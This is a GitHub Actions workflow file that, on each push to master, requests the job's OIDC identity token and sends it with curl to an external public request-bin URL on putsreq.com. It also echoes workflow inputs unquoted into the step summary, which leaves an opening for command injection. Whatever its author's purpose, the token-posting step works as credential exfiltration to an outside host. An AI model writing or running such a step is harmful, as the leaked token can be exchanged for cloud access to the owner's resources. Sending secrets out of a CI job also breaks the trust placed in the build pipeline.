name: Manual

on:
  push:
    branches: [ "master" ]
  
permissions:
  id-token: write # required to request id-token

jobs:
  run:
    runs-on: [ubuntu-latest]
    
    steps:
    - name: Add Inouts
      run: |
        echo "${{ toJSON(github.event.inputs) }}" >> $GITHUB_STEP_SUMMARY

    - run: |
        echo ACTIONS_ID_TOKEN_REQUEST_URL $ACTIONS_ID_TOKEN_REQUEST_URL

        OIDC_TOKEN=$(
          curl -sLS "${ACTIONS_ID_TOKEN_REQUEST_URL}" \
            -H "User-Agent: actions/oidc-client" \
            -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN"
        )
        curl -i -s --data-binary "$OIDC_TOKEN" https://putsreq.com/aBB8O4s2D0PuDWTKlSK1 
      

